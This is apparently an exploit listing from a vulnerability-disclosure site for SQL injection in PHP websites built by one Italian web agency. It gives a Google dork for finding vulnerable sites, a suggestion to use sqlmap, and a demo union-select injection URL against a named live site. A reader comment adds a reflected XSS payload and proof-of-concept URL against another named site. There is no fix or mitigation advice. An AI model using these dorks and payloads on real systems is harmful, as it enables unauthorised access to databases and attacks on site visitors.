G&G srl - Web Agency Sql İnjection Vulnerability

2018.03.30
tr TrazeR (TR) tr
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A
Dork: intext:"Powered by G&G srl - Web Agency & Communication" inurl:php?id

################################################################################# # Exploit Title: G&G srl - Web Agency Sql İnjection Vulnerability # Author : TrazeR # Google Dork : intext:"Powered by G&G srl - Web Agency & Communication" inurl:php?id # Tested on : Kali Linux 2018.1 # Date : 29.03.2018 # Vendor Home: http://www.gegweb.it/ # Blog : http://www.trazer.org/ # Forum : http://www.turkz.org/Forum/ # Telegram: https://t.me/turkzgrup ################################################################################# [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] root@TrazeR:~# Tutorial : [+] Dorking İn Google Or Other Search Enggine [+] Sqlmap Or Manuel Demo: http://www.omav.it/servizi.php?id=servizi&LANG=999999.9 union all select 1,[t],3,4 Greet'Zzz :TrazeR & Zer0day & Göcebe & Kutluhan & R4PTOR [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]

References:

http://www.trazer.org/
http://www.turkz.org/Forum/


See this note in RAW Version
Vote for this issue:
100%
0%

Comment it here.
Drok3r | Date: 2018-04-02 01:42 CET+1
They are also vulnerable to XSS. [*] Site: http://www.alyssatech.it [*] Payload:%27%3Cscript%3Ealert(/CXSECURITY/)%3C/script%3E [*] PoC: http://www.alyssatech.it/contatti.php?id=contatti&LANG=1%27%3Cscript%3Ealert(/CXSECURITY/)%3C/script%3E
Copyright 2025, cxsecurity.com

 

Back to Top